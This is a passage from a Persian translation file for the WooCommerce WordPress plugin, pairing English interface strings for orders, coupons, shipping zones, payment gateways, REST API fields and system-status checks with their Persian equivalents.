(ضروری)','Zone ID.'=>'شناسه منطقه.','ID.'=>'شناسه.','Recalculate totals? This will calculate taxes based on the customers country (or the store base country) and update totals.'=>'محاسبه مجدد مجموع؟ مالیات بر اساس کشور مشتریان (یا کشور پایه در تنظیمات فروشگاه) محاسبه و جمع کل به روز رسانی خواهد شد.','Recalculate'=>'محاسبه مجدد','All missing WooCommerce pages successfully installed'=>'همه برگه‌های گمشده ووکامرس با موفقیت نصب شد','%s (Copy)'=>'%s (کپی)','Taxonomies: Product visibility'=>'طبقه بندی‌ها: مشاهده محصول','Terms in the product visibility taxonomy.'=>'شرایط در طبقه بندی مشاهده محصول.','A list of taxonomy terms used for product visibility.'=>'لیست شرایط طبقه بندی بکاررفته برای مشاهده محصول.','Invalid product ID'=>'شناسه نامعتبر محصول','Increase existing price by (fixed amount or %):'=>'افزایش قیمت موجود توسط (مقدار ثابت یا %):','Parent theme author URL'=>'آدرس نویسنده (طراح) پوسته والد','Sorry, you cannot edit this resource.'=>'با عرض پوزش، شما نمی توانید این منبع را ویرایش کنید.','Active plugins'=>'افزونه‌های فعال','Parent theme version'=>'نسخه پوسته والد','Parent theme name'=>'نام پوسته والد','Customer sales'=>'فروش مشتری','cURL version'=>'نسخه cURL','Max upload size'=>'بیشینه اندازه آپلود','MySQL version'=>'نسخه MySQL','Number of decimals'=>'تعداد اعشارها','Thousand separator'=>'جداکننده هزارگان','Currency position'=>'محل واحد پولی','Decimal separator'=>'جداکننده‌ی اعشاری','PHP version'=>'نسخه PHP','Server info'=>'اطلاعات سرور','Shipping method'=>'روش حمل و نقل','Customer provided note:'=>'یادداشت ارائه شده مشتری:','Zoom in/out'=>'بزرگ‎نمایی/کوچک‎نمایی','Automattic'=>'اتوماتیک','Awaiting product image'=>'در انتظار تصویر محصول','Next (arrow right)'=>'بعدی (arrow right)','Previous (arrow left)'=>'قبلی (arrow left)','Toggle fullscreen'=>'تغییر حالت به تمام صفحه','Share'=>'اشتراک گذاری','Close (Esc)'=>'بستن (Esc)','Search products…'=>'جستجوی محصولات;','%1$s review for %2$s'=>'%1$s دیدگاه برای %2$s','%1$s ending in %2$s'=>'%1$s پایان یافته در %2$s','%1$s for %2$s item'=>'%1$s برای %2$s مورد','From your account dashboard you can view your recent orders, manage your shipping and billing addresses, and edit your password and account details.'=>'از طریق پیشخوان حساب کاربری‌تان، می‌توانید سفارش‌های اخیرتان را مشاهده، آدرس‌های حمل و نقل و صورتحساب‌تان را مدیریت و جزییات حساب کاربری و کلمه عبور خود را ویرایش کنید.','Hello %1$s (not %1$s? Log out)'=>'سلام %1$s (%1$s نیستید؟ خارج شوید)','This will give "%1$s" %2$s access which will allow it to:'=>'این کار به "%1$s" %2$s اجازه دسترسی به این‌ها را می دهد:','(estimated for %s)'=>'(تخمین زده شده برای %s)','Max %s'=>'حداکثر %s','Min %s'=>'حداقل %s','The payment gateway for this order does not support automatic refunds.'=>'درگاه پرداخت برای این سفارش از بازپرداخت خودکار پشتیبانی نمی کند.','The payment gateway for this order does not exist.'=>'درگاه پرداخت برای این سفارش وجود ندارد.','Invalid refund amount.'=>'مبلغ بازپرداخت نامعتبر است.','Coupon: %s'=>'کد تخفیف: %s','Fixed product discount'=>'تخفیف ثابت محصول','Fixed cart discount'=>'تخفیف ثابت سبدخرید','Percentage discount'=>'درصد تخفیف','Iranian toman'=>'تومان ایران','%s does not exist.'=>'%s وجود ندارد.','Your password has been reset successfully.'=>'رمز عبور شما با موفقیت بازنشانی شده است.','Specific countries'=>'کشورهای خاص','Free shipping'=>'حمل و نقل رایگان','Visit %s admin area:'=>'مشاهده %s ناحیه مدیریت:','%1$s ending in %2$s (expires %3$s/%4$s)'=>'%1$s پایان یافته در %2$s (انقضاء %3$s/%4$s)','This method should not be called before plugins_loaded.'=>'این متد نباید قبل از plugins_loaded فراخوانی شود.','Product properties should not be accessed directly.'=>'نباید مستقیماً به ویژگی‌های محصول دسترسی پیدا کرد.','You have received the following WooCommerce log message:'=>'شما پیام‌های خطا ووکامرس زیر را دریافت کرده‌اید:','[%1$s] %2$s: %3$s WooCommerce log message'=>'[%1$s] %2$s: %3$s پیام گزارش ووکامرس','Optionally enter the URL to a 150x50px image displayed as your logo in the upper left corner of the PayPal checkout pages.'=>'به صورت اختیاری، آدرس URL یک تصویر 150x50 پیکسلی را وارد نمائید تا به عنوان لوگو در گوشه چپ صفحات تسویه حساب PayPal به عنوان لوگو نمایش داده شود.','Image url'=>'آدرس اینترنتی تصویر','PayPal sandbox can be used to test payments. Sign up for a developer account.'=>'PayPal sandbox می تواند جهت تست پرداخت‌ها استفاده شود. عضویت برای حساب کاربری توسعه دهنده.','Payment authorized. Change payment status to processing or complete to capture funds.'=>'تأیید پرداخت.تغییر وضعیت پرداخت به پردازش یا کامل به تصرف منابع مالی است.','Payment for cancelled order %s received'=>'پرداخت برای سفارش لغو شده %s دریافت شد','Order #%s has been marked paid by PayPal IPN, but was previously cancelled. Admin handling required.'=>'سفارش #%s توسط PayPal IPN به عنوان پرداخت شده علامت خورد، اما قبلا لغو شده بود. رسیدگی مدیر نیاز است.','Payment of %1$s was captured - Auth ID: %2$s, Transaction ID: %3$s'=>'پرداخت %1$s دریافت شد - شناسه تایید: %2$s, شناسه تراکنش: %3$s','Payment could not be captured: %s'=>'پرداخت نمی تواند انجام شود: %s','Payment could not be captured - Auth ID: %1$s, Status: %2$s'=>'پرداخت نمی تواند انجام شود - شناسه تایید: %1$s، وضعیت: %2$s','Bank'=>'بانک','To override and edit this email template copy %1$s to your theme folder: %2$s.'=>'برای بازنویسی و ویرایش قالب این ایمیل %1$s را کپی کنید به پوشه قالب: %2$s.','Invalid payment token.'=>'رمز پرداخت نامعتبر است.','Invalid download.'=>'دانلود نامعتبر است.','Output just the id when the operation is successful.'=>'خروجی فقط شناسه باشد وقتی عملیات موفق است.','Invalid or missing payment token fields.'=>'قسمت رمز پرداخت نامعتبر یا فراموش شده است.','%1$d update functions completed. Database version is %2$s'=>'%1$d به روز رسانی کامل شد. نسخه پایگاه داده %2$s','Invalid coupon.'=>'کدتخفیف نامعتبر است.','Invalid customer.'=>'مشتری نامعتبر است.','Make sure to include the --user flag with an account that has permissions for this action.'=>'اطمینان از --علامت کاربر با حساب کاربری که برای این عمل دسترسی داشته باشد.','Render response in a particular format.'=>'ارائه پاسخ در قالب خاص.','The id for the resource.'=>'شناسه برای منبع.','Get the value of an individual field.'=>'بدست آوردن مقدار یک فیلد منحصر به فرد.','Limit response to specific fields. Defaults to all fields.'=>'محدود کردن پاسخ به فیلدهای مشخص. پیش‎فرض به همه فیلدها.','No schema title found for %s, skipping REST command registration.'=>'عنوان الگوی %s یافت نشد، دستور ثبت REST نادیده گرفته میشود.','External products cannot be stock managed.'=>'مدیریت انبار برای محصولات خارجی ممکن نیست.','External products cannot be backordered.'=>'محصولات خارجی را نمی توان برگشت داد.','Updated'=>'به روز شد','Deleted'=>'حذف شد','Trashed'=>'به سطل آشغال انتقال یافت','Product AttributeProduct %s'=>'محصول %s','Parent category:'=>'دسته اصلی:','Parent category'=>'دسته اصلی','Search tags'=>'جستجوی برچسب‌ها','Popular tags'=>'برچسب‌های محبوب','Separate tags with commas'=>'برچسب‌ها را با کاما از هم جدا کنید','Add or remove tags'=>'اضافه کردن یا حذف برچسب‌ها','Choose from the most used tags'=>'انتخاب از برچسب‌های پر استفاده','Product shipping classes'=>'کلاس‌های حمل و نقل محصول','Order status set to %s.'=>'وضعیت سفارش به %s تغییر یافت.','All tags'=>'همه برچسب‌ها','Invalid variation ID'=>'شناسه تنوع نامعتبر است','No categories found'=>'هیچ دسته‌ای پیدا نشد','New category name'=>'نام دسته جدید','Add new category'=>'افزودن دسته جدید','Update category'=>'بروزرسانی دسته','Edit category'=>'ویرایش دسته','All categories'=>'همه دسته‌ها','Search categories'=>'جستجوی دسته‌ها','No tags found'=>'برچسبی یافت نشد','New tag name'=>'نام برچسب جدید','Add new tag'=>'اضاف کردن برچسب جدید','Update tag'=>'به روز رسانی برچسب','Edit tag'=>'ویرایش برچسب','Tag'=>'برچسب','Invalid tax class'=>'کلاس مالیاتی نامعتبر','Invalid product'=>'محصول نامعتبر','Category'=>'دسته ها','Visit premium customer support'=>'مشاهده پشتیبانی مشتریان پولی','Invalid data store.'=>'داده فروشگاه نامعتبر است.','Apartment, suite, unit, etc. (optional)'=>'آپارتمان، مجتمع، واحد و... (اختیاری)','%1$s is low in stock. There are %2$d left.'=>'موجودی %1$s کم است. تنها %2$d باقی مانده است.','Eircode'=>'کد پستی ایرلند','Error:'=>'خطا:','Invalid value posted for %s'=>'مقدار نامعتبر ارسال شده برای %s','Invalid billing email address'=>'آدرس ایمیل صورتحساب نامعتبر است','Invalid role'=>'نقش نامعتبر','Invalid email address'=>'آدرس ایمیل نامعتبر است','Street address'=>'آدرس خیابان','%d item from your previous order is currently unavailable and could not be added to your cart.'=>'%d مورد از سفارش قبلی شما دردسترس نیست و نمی تواند به سبد خریدتان اضافه شود.','Invalid discount type.'=>'نوع تخفیف نامعتبر است.','Invalid email address restriction.'=>'محدودیت آدرس ایمیل نامعتبر.','You cannot add another "%s" to your cart.'=>'شما نمی توانید "%s" دیگری به سبدخرید خود اضافه نمایید.','View cart'=>'مشاهده سبد خرید','Invalid order'=>'سفارش نامعتبر','In order for database caching to work with WooCommerce you must add %1$s to the "Ignored Query Strings" option in W3 Total Cache settings.'=>'بمنظور ذخیره پایگاه داده برای کار با ووکامرس باید اضافه کنید %1$s برای تنظیمات "صرف نظر کردن از کوئری رشته‌ها" در تنظیمات W3 Total Cache.','Invalid resource ID.'=>'شناسه منبع نامعتبر.','The date of the customer last order, as GMT.'=>'تاریخ آخرین سفارش مشتری بصورت GMT.','Invalid product review ID.'=>'شناسه دیدگاه محصول نامعتبر است.','The product review does not support trashing.'=>'دیدگاه محصول انتقال به سطل زباله را پشتیبانی نمی کند.','The product review cannot be deleted.'=>'دیدگاه محصول نمی تواند حذف شود.','Updating product review failed.'=>'به روز رسانی دیدگاه محصول با شکست مواجه شد.','Creating product review failed.'=>'ایجاد دیدگاه محصول با شکست مواجه گردید.','The comment has already been trashed.'=>'این نظر در حال حاضر به سطل زباله شده منتقل شده است.','Could not update the attribute.'=>'ویژگی را نمی توان بروزرسانی کرد.','The date the customer was created, as GMT.'=>'تاریخ ایجاد مشتری بصورت GMT.','This resource cannot be created.'=>'این منبع نمی تواند ایجاد شود.','Tool ran.'=>'ابزار ran.','A unique identifier for the tool.'=>'شناسه منحصر به فرد برای ابزار.','Invalid tool ID.'=>'شناسه ابزار معتبر نیست.','The date the webhook was last modified, as GMT.'=>'تاریخ webhook آخرین ویرایش،براساس منطقه زمانی سایت.','There was an error calling this tool. There is no callback present.'=>'خطا در فراخوانی این ابزار، پاسخی برای درخواست وجود ندارد.','This tool will install all the missing WooCommerce pages. Pages already defined and set up will not be replaced.'=>'این ابزار همه برگه‌های گم شده ووکامرس را نصب می‎کند. برگه‌های از قبل تعریف و راه‎اندازی شده جایگزین نمی‎شوند.','Did the tool run successfully?'=>'آیا ابزار با موفقیت اجرا شد؟','%d orphaned variations deleted'=>'%d حذف تغییرات بدون والد','The date the webhook was created, as GMT.'=>'تاریخ ایجاد webhook بصورت GMT.','The date the webhook delivery was logged, as GMT.'=>'تاریخ گزارش webhook تحویل شده بصورت GMT.','Tool return message.'=>'پیام بازگشتی ابزار.','Tool description.'=>'توضیحات ابزار.','What running the tool will do.'=>'اجرای این ابزار چه کاری میتواند انجام دهد.','Tool name.'=>'نام ابزار.','Hide errors from visitors?'=>'می خواهید خطاها را از بازدیدکنندگان مخفی نگه دارید؟','Geolocation enabled?'=>'موقعیت جغرافیایی فعال است؟','Is mbstring enabled?'=>'آیا mbstring فعال است؟','Remote GET successful?'=>'GET از راه دور موفق بود؟','Remote POST successful?'=>'POST از راه دور موفق بود؟','Is this theme a child theme?'=>'آیا این یک قالب فرزند است؟','Does this theme have outdated templates?'=>'آیا این پوسته قالب‌های تاریخ گذشته دارد؟','Does the theme declare WooCommerce support?'=>'آیا پوسته اعلام پشتیبانی ووکامرس دارد؟','Orphaned variations'=>'متغیر‌های بدون والد','This tool will delete all variations which have no parent.'=>'این ابزار همه تغییر‌اتی که والدی ندارد را حذف می کند.','Delete orphaned variations'=>'حذف متغیرهای بدون والد','Does the theme have a woocommerce.php file?'=>'آیا پوسته، فایل woocommerce.php را دارد؟','SSL forced?'=>'اجبار به استفاده از SSL؟','WooCommerce pages.'=>'برگه‌های ووکامرس.','Security.'=>'امنیت.','Taxonomy terms for product/order statuses.'=>'شرایط طبقه‌بندی برای محصول/وضعیت‌های سفارش.','Currency symbol.'=>'نماد واحد پولی.','Currency.'=>'واحد پول.','Settings.'=>'تنظیمات.','Template overrides.'=>'بازنویسی‎های قالب.','Theme author URL.'=>'آدرس نویسنده قالب.','Latest version of theme.'=>'آخرین نسخه قالب.','Theme version.'=>'نسخه قالب.','Theme name.'=>'نام قالب.','Theme.'=>'قالب.','Database tables.'=>'جداول پایگاه داده.','Database prefix.'=>'پیشوند پایگاه داده.','Database.'=>'پایگاه داده.','Remote GET response.'=>'پاسخ از راه دور GET .','Remote POST response.'=>'پاسخ ازراه دور POST.','Unique ID for the resource.'=>'شناسه یکتا برای منبع.','Is GZip enabled?'=>'آیا GZip فعال است؟','Is SUHOSIN installed?'=>'آیا SUHOSIN نصب است؟','Are WordPress cron jobs enabled?'=>'آیا cron jobs وردپرس فعال است؟','Is WordPress debug mode active?'=>'آیا حالت debug وردپرس فعال است؟','Is WordPress multisite?'=>'آیا وردپرس چند سایته است؟','A unique identifier that can be used to link settings together.'=>'شناسه منحصربه فرد که می تواند تنظیمات را به هم پیوند دهد.','Is DomDocument class enabled?'=>'آیا کلاس DomDocument فعال است؟','Is SoapClient class enabled?'=>'آیا کلاس SoapClient فعال است؟','Limit result set to products based on a maximum price.'=>'نتایج محدود شده روی محصولات با حداکثر قیمت.','Limit result set to products based on a minimum price.'=>'نتایج محدود شده روی محصولات با حداقل قیمت.','Limit result set to products on sale.'=>'نتایج محدود شده روی محصولات فروش ویژه.','ID of parent grouping.'=>'شناسه گروه اصلی.','IDs for settings sub groups.'=>'شناسه‌ها برای تنظیمات زیر گروه.','Settings group ID.'=>'شناسه گروه تنظیمات.','Shipping methods do not support trashing.'=>'روش‌های حمل و نقل از سطل زباله پشتیبانی نمی کنند.','Invalid setting.'=>'تنظیمات نامعتبر است.','Is log directory writable?'=>'آیا پوشه گزارش (log) قابل نوشتن است؟','Invalid setting group.'=>'گروه تنظیمات نامعتبر است.','No setting groups have been registered.'=>'هیچ گروهی برای تنظیمات ثبت نشده است.','Array of options (key value pairs) for inputs such as select, multiselect, and radio buttons.'=>'مجموعه ای از گزینه‌ها (جفت مقادیر کلیدها) برای ورودی‌هایی مانند انتخاب، چند انتخابی، و دکمه‌های رادیویی.','Resource cannot be created. Check to make sure \'order\' and \'name\' are present.'=>'منابع نمی تواند ایجاد شود. برای اطمینان بررسی کنید "سفارش" و "نام" وجود دارند.','Shipping zone order.'=>'ترتیب منطقه حمل و نقل.','Shipping zones do not support trashing.'=>'مناطق حمل و نقل، از سطل زباله پشتیبانی نمی کنند.','Shipping zone name.'=>'نام منطقه حمل و نقل.','Shipping method settings.'=>'تنظیمات روش حمل و نقل.','Shipping method enabled status.'=>'وضعیت فعال بودن روش حمل و نقل.','Shipping method customer facing title.'=>'عنوان روش حمل و نقل نمایان برای مشتری.','Shipping method instance ID.'=>'شناسه نمونه روش حمل و نقل.','Resource cannot be created.'=>'منبع نمی تواند ایجاد شود.','Unique ID for the instance.'=>'شناسه یکتا برای نمونه.','Unique ID for the zone.'=>'شناسه یکتا برای منطقه.','Shipping zone location type.'=>'نوع محل منطقه حمل و نقل.','Shipping zone location code.'=>'کد محل منطقه حمل و نقل.','Shipping method description.'=>'توضیح روش حمل و نقل.','Shipping method title.'=>'عنوان روش حمل و نقل.','Method ID.'=>'شناسه روش.','Is fsockopen/cURL enabled?'=>'فعال است؟','PHP max input vars.'=>'حداکثر ورودی متغیر PHP.','PHP max execution time.'=>'بیشترین زمان اجرای PHP .','PHP post max size.'=>'حداکثر اندازه پست PHP.','WordPress language.'=>'زبان وردپرس.','WordPress memory limit.'=>'محدودیت حافظه وردپرس.','WordPress version.'=>'نسخه وردپرس.','Log directory.'=>'پوشه گزارش.','WooCommerce version.'=>'نسخه ووکامرس.','Site URL.'=>'آدرس سایت.','Home URL.'=>'آدرس صفحه اصلی.','Environment.'=>'محیط.','Shipping method sort order.'=>'ترتیب مرتب کردن روش حمل و نقل.','Limit result set to products in stock or out of stock.'=>'نتایج محدود شده روی محصولات موجود در انبار یا اتمام موجودی.','Limit result set to products with a specific tax class.'=>'نتایج محدود شده روی محصولاتی با کلاس مالیاتی خاص.','Default timezone.'=>'منطقه زمانی پیشفرض.','A unique identifier for the setting.'=>'شناسه منحصربه فرد برای تنظیمات.','Number of days until access to downloadable files expires.'=>'تعداد روزهای باقی مانده برای منقضی شدن دسترسی به فایل دانلودی.','Number of times downloadable files can be downloaded after purchase.'=>'تعداد دفعات قابل دانلود بودن فایل بعد از پرداخت.','End date of sale price, in the site\'s timezone.'=>'زمان پایان حراج، براساس ناحیه زمانی سایت.','A human readable description for the setting used in interfaces.'=>'توضیح قابل خواندن برای انسان برای تنظیمات بکاررفته در ظاهر.','A human readable label for the setting used in interfaces.'=>'برچسب قابل خواندن برای انسان برای تنظیمات بکار رفته در ظاهر.','Payment gateway method title.'=>'عنوان درگاه پرداخت.','Payment gateway title on checkout.'=>'عنوان درگاه پرداخت در برگه پرداخت.','Payment gateway ID.'=>'شناسه درگاه پرداخت.','Payment gateway method description.'=>'جزئیات درگاه پرداخت.','Payment gateway sort order.'=>'ترتیب قرار گیری درگاه پرداخت.','The date the product was last modified, as GMT.'=>'تاریخ آخرین ویرایش محصول، در منطقه زمانی سایت.','Payment gateway description on checkout.'=>'توضیحات درگاه پرداخت در برگه پرداخت.','Payment gateway settings.'=>'تنظیمات درگاه پرداخت.','Payment gateway enabled status.'=>'وضعیت فعال بودن درگاه پرداخت.','Placeholder text to be displayed in text inputs.'=>'متن جانگهدار جهت نمایش در ورودی‌های متنی.','List of variations IDs.'=>'لیست شناسه‌های متغیرها.','Start date of sale price, in the site\'s timezone.'=>'زمان شروع فروش ویژه براساس ناحیه زمانی سایت.','Start date of sale price, as GMT.'=>'زمان شروع فروش ویژه براساس GMT.','Limit result set to featured products.'=>'نتایج محدود شده روی محصولات ویژه.','The date the product was created, as GMT.'=>'تاریخ ایجاد محصول بصورت GMT.','The date the review was created, as GMT.'=>'تاریخ ایجاد نقد مشتری براساس GMT.','The content of the review.'=>'محتوای دیدگاه.','The date the image was created, as GMT.'=>'تاریخ ایجاد تصویر براساس GMT.','Additional help text shown to the user about the setting.'=>'متن راهنمایی بیشتر جهت نمایش به کاربر درباره تنظیمات.','The date the image was last modified, as GMT.'=>'تاریخ آخرین تغییر تصویر براساس GMT.','Setting value.'=>'مقدار تنظیمات.','Type of setting.'=>'نوع تنظیمات.','The date the order was completed, as GMT.'=>'تاریخ تکمیل شدن سفارش براساس GMT.','The date the order was paid, as GMT.'=>'تاریخ پرداخت سفارش براساس GMT.','Default value for the setting.'=>'مقدار پیشفرض برای تنظیم.','Meta data.'=>'داده متا.','User ID of user who created the refund.'=>'شناسه کاربری از کاربری که بازپرداخت ایجاد کرده است.','Is the customer a paying customer?'=>'آیا مشتری یک مشتری پرداختی است؟','Version of WooCommerce which last updated the order.'=>'نسخه ووکامرس که آخرین بروزرسانی سفارش انجام شده است.','If true, the note will be shown to customers and they will be notified. If false, the note will be for admin reference only.'=>'اگر صحیح باشد، نوشته نمایش می یابد برای مشتری‌ها و آن‌ها آگاه می شوند. اگر غلط باشد، نوشته فقط برای مدیریت نمایش می یابد.','Limit result to customers or internal notes.'=>'نتیجه محدود برای مشتری‌ها یا یادداشت‌های داخلی.','List of user IDs (or guest email addresses) that have used the coupon.'=>'لیست شناسه کاربران (یا ایمیل مهمان) که از کدتخفیف استفاده کردند.','If true, this coupon will not be applied to items that have sale prices.'=>'اگر فعال باشد کدتخفیف روی محصولاتی که فروش ویژه هستند اعمال نخواهد شد.','If true and if the free shipping method requires a coupon, this coupon will enable free shipping.'=>'اگر فعال باشد و اگر روش حمل و نقل رایگان نیازمند یک کدتخفیف باشد، این کدتخفیف، حمل و نقل رایگان را فعال خواهد کرد.','How many times the coupon can be used in total.'=>'در مجموع چندبار می توان کدتخفیف را به کار برد.','Meta ID.'=>'شناسه متا (Meta ID).','The date the order was last modified, as GMT.'=>'تاریخ آخرین تغییر سفارش براساس GMT.','When true, the payment gateway API is used to generate the refund.'=>'وقتی صحیح است API درگاه پرداخت بکار می رود برای تولید بازگشت پول.','The date the order refund was created, as GMT.'=>'تاریخ ایجاد بازگشت پول براساس GMT.','The date the order note was created, as GMT.'=>'تاریخ ایجاد یادداشت سفارش براساس GMT.','The date the customer was last modified, as GMT.'=>'تاریخ آخرین تغییر مشتری براساس GMT.','The date the order was created, as GMT.'=>'تاریخ ایجاد سفارش براساس GMT.','The date when download access expires, as GMT.'=>'تاریخ زمانی که دسترسی دانلود منقضی می شود براساس GMT.','If true, the coupon can only be used individually. Other applied coupons will be removed from the cart.'=>'اگر فعال باشد، کدتخفیف می تواند بطور جداگانه استفاده شود. کدهای تخفیف اعمال شده‌ی دیگر از سبد خرید حذف می شوند.','The date the coupon was created, as GMT.'=>'تاریخ ایجاد کدتخفیف براساس GMT.','The date the coupon was last modified, as GMT.'=>'تاریخ آخرین تغییرات کدتخفیف براساس GMT.','From %1$s to %2$s'=>'از %1$s به %2$s','The date the coupon expires, as GMT.'=>'تاریخ انقضاء کدتخفیف براساس GMT.','The date the coupon expires, in the site\'s timezone.'=>'تاریخ انقضاء کدتخفیف براساس منطقه زمانی سایت.','Missing OAuth parameter %s'=>'پارامتر OAuth گم شده است %s','The amount of discount. Should always be numeric, even if setting a percentage.'=>'میزان تخفیف. باید مقدار عددی باشد، حتی اگر تنظیم درصدی باشد.','Set to regular price decreased by (fixed amount or %):'=>'تنظیم کنید تا قیمت عادی به طور منظم کاهش یابد (مقدار ثابت و یا %):','Decrease existing sale price by (fixed amount or %):'=>'کاهش قیمت فروش ویژه موجود با (مقدار ثابت و یا %):','Outdated templates'=>'قالب‌های قدیمی','— No change —'=>'— بدون تغییر —','Learn how to update'=>'چگونگی به روز رسانی را بیاموزید','Increase existing sale price by (fixed amount or %):'=>'افزایش قیمت فروش ویژه موجود با (مقدار ثابت و یا %):','Version %1$s is out of date. The core version is %2$s'=>'نگارش %1$s قدیمی است. نگارش اصلی %2$s است','Page visibility should be public'=>'نمایش برگه بایدعمومیباشد','Error messages can contain sensitive information about your store environment. These should be hidden from untrusted visitors.'=>'متن خطاها می تواند شامل اطلاعات حساس درباره فضای نگهداری شما باشد. حتما باید از دیدکاربران شما مخفی بماند.','Your store is not using HTTPS. Learn more about HTTPS and SSL Certificates.'=>'فروشگاه شما از HTTPS استفاده نمی کند. اطلاعات بیشتر درباره HTTPS و SSL Certificates.','Is the connection to your store secure?'=>'آیا ارتباط فروشگاه شما امن است؟','Error messages should not be shown to visitors.'=>'پیام‌های خطا نباید به بازدیدکنندگان نشان داده شوند.','Secure connection (HTTPS)'=>'ارتباط امن (HTTPS)','Edit %s page'=>'ویرایش %s برگه','Taxonomies: Product types'=>'طبقه بندی: انواع محصولات','Hide errors from visitors'=>'پنهان کردن خطاها از بازدیدکنندگان','Security'=>'امنیت','How to update your database table prefix'=>'چگونه پیشوند جدول پایگاه داده را بروزرسانی کنید','%1$s - We recommend using a prefix with less than 20 characters. See: %2$s'=>'%1$s - توصیه می کنیم استفاده از پیشوند کمتر از 20 کاراکتر. ببینید: %2$s','Database prefix'=>'پیشوند پایگاه داده','Multibyte string'=>'رشته چند بایتی (Multibyte String)','GZip'=>'GZip','DOMDocument'=>'DOMDocument','SoapClient'=>'SoapClient','fsockopen/cURL'=>'fsockopen/cURL','Are you sure you want to clear all logs from the database?'=>'آیا اطمینان دارید که می خواهید همه گزارش‌ها را از پایگاه داده حذف کنید؟','Flush all logs'=>'پاکسازی همه گزارش‌ها','Delete log'=>'حذف گزارش','REST API version used in the webhook deliveries.'=>'نسخه REST API در webhook deliveries بکار می رود.','WP REST API Integration v%d'=>'ادغام WP REST API v%d','Legacy API v3 (deprecated)'=>'رابط برنامه نویسی سابق (API) نسخه 3 (منسوخ شده)','Pagination%1$s of %2$s'=>'%1$s از%2$s','Search for a user…'=>'جستجو برای کاربر ;','Zone regions'=>'نواحی منطقه','Are you sure you want to delete this zone? This action cannot be undone.'=>'آیا مطمئن هستید که می خواهید این منطقه را حذف نمائید؟ این عمل نمی تواند برگشت پذیر باشد.','Enable debug mode'=>'فعال کردن حالت اشکال زدایی','Debug mode'=>'حالت اشکال زدایی','Shipping zones'=>'مناطق حمل و نقل','When product stock reaches this amount the stock status will change to "out of stock" and you will be notified via email. This setting does not affect existing "in stock" products.'=>'وقتی موجودی محصول به این اندازه رسید وضعیت موجودی به "ناموجود" تغییر می کند و از طریق ایمیل به شما اطلاع داده می شود. این تنظیمات تاثیری نمی گذارد بر "در انبار" محصولات.','Never show quantity remaining in stock'=>'هرگز میزان موجودی در انبار را نشان نده','This controls how stock quantities are displayed on the frontend.'=>'این گزینه نحوه نمایش موجودی انبار برای کاربر را کنترل میکند.','When product stock reaches this amount you will be notified via email.'=>'هنگامی که موجودی انبار محصول به این مقدار می رسد به شما توسط ایمیل اطلاع رسانی خواهد شد.','Only show quantity remaining in stock when low e.g. "Only 2 left in stock"'=>'فقط نمایش بده میزان موجودی را در انبار زمانی که کم است مثلا تنها 2 در انبار مانده باشد.','Always show quantity remaining in stock e.g. "12 in stock"'=>'همیشه موجودی را نشان بده مانند 12 عدد در انبار','Page contents: [%s]'=>'محتوای برگه: [%s]','Choose a category to view stats'=>'برای مشاهده آمار یک دسته انتخاب نمایید','Choose a product to view stats'=>'انتخاب یک محصول برای مشاهده آمار','%1$s sales in %2$s'=>'%1$s فروش در %2$s','%1$s refunded %2$d order (%3$d item)'=>'%1$s مسترد شده برای %2$d سفارش (%3$d مورد)','Dimensions (%s)'=>'ابعاد (%s)','This lets you choose which products are part of this group.'=>'این اجازه می دهد انتخاب کنید که محصولات بخشی از این گروه هستند.','Enter an optional description for this variation.'=>'جزئیاتی دلخواه برای این تنوع وارد کنید.','Length x width x height in decimal form'=>'طول × عرض × ارتفاع به صورت اعشاری','Add file'=>'اضافه کردن فایل','Weight (%s)'=>'وزن (%s)','Grouped products'=>'محصولات گروهی','Refund #%1$s - %2$s'=>'برگشتی #%1$s - %2$s','Refund %s manually'=>'برگشت %s دستی','Refund %1$s via %2$s'=>'برگشت %1$s توسط %2$s','Any %s…'=>'هر %s;','No default %s…'=>'بدون پیشفرض %s;','Coupon(s)'=>'کد(های) تخفیف','%s (No longer exists)'=>'%s (دیگر موجود نیست)','Customer IP: %s'=>'آی پی مشتری: %s','Address:'=>'آدرس:','%1$s #%2$s details'=>'جزئیات %1$s شماره %2$s','Copy billing address'=>'کپی آدرس صورتحساب','Apply to all qualifying items in cart'=>'اعمال بر همه موارد واجد شرایط در سبدخرید','Unlimited usage'=>'استفاده نامحدود','View other orders →'=>'نمایش سایر سفارش‌ها ;','Customer payment page →'=>'صفحه پرداخت مشتری ;','Import complete - imported %s tax rates.'=>'درون‌ریزی کامل شد - درون‌ریزی %s نرخ مالیات.','Tool does not exist.'=>'ابزار وجود ندارد.','Safe and secure payments using credit cards or your customer\'s PayPal account. Learn more.'=>'پرداخت‌های ایمن و مطمئن بکارگیری کارت اعتباری یاحساب کاربری پی پال کاربران شما. یادگیری بیشتر درباره پی پال.','%1$s (%2$s)'=>'%1$s (%2$s)','This is the WooCommerce shop page. The shop page is a special archive that lists your products. You can read more about this here.'=>'این برگه فروشگاه ووکامرس است. برگه فروشگاه بایگانی مخصوصی است که لیست محصولات شما می باشد. اطلاعات بیشتر در اینجا.','Address line 1'=>'آدرس','Address line 2'=>'ادامۀ آدرس','%1$s (#%2$s – %3$s)'=>'%1$s (#%2$s – %3$s)','%1$s / %2$s'=>'%1$s / %2$s','All sources'=>'همه منابع','Filter by source'=>'پالایش توسط منبع','Source'=>'منبع','Message'=>'پیام','Level'=>'سطح','Timestamp'=>'برچسب زمان','All levels'=>'همه سطوح','Filter by level'=>'پالایش توسط سطح','Debug'=>'اشکال زدایی','Info'=>'اطلاعات','Notice'=>'اطلاع','Warning'=>'هشدار','Critical'=>'بحرانی','Alert'=>'هشدار','Emergency'=>'اضطراری','System status'=>'وضعیت سیستم','reviewed by %s'=>'بررسی شده توسط %s','%s out of 5'=>'%s از 5','%s net sales this month'=>'%s فروش خالص این ماه','(Public)'=>'(عمومی)','Enable archives?'=>'بایگانی فعال شود؟','%1$s at %2$s'=>'%1$s در %2$s','Shipping is disabled.'=>'حمل و نقل غیرفعال شده است.','FATA'=>'FATA','Method \'%s\' not implemented. Must be overridden in subclass.'=>'روش \'%s\' پیاده سازی نشده است. باید در زیر کلاس overridden شود.','An invalid setting value was passed.'=>'مقدار تنظیم نامعتبر تصویب شد.','Invalid product tax status.'=>'وضعیت مالیات محصول نامعتبر است.','Invalid or duplicated SKU.'=>'SKU تکراری یا نامعتبر است.','Sindh'=>'Sindh','Khyber Pakhtunkhwa'=>'Khyber Pakhtunkhwa','Islamabad Capital Territory'=>'Islamabad Capital Territory','Gilgit Baltistan'=>'Gilgit Baltistan','Balochistan'=>'Balochistan','Azad Kashmir'=>'Azad Kashmir','Invalid catalog visibility option.'=>'گزینه قابلیت مشاهده کاتالوگ نامعتبر است.','Invalid currency code'=>'کد واحد پولی نامعتبر است','Invalid parent ID'=>'شناسه اصلی 